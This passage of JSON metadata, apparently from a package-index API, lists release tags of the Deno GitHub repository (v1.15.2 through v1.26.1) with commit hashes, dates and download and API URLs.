nd":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1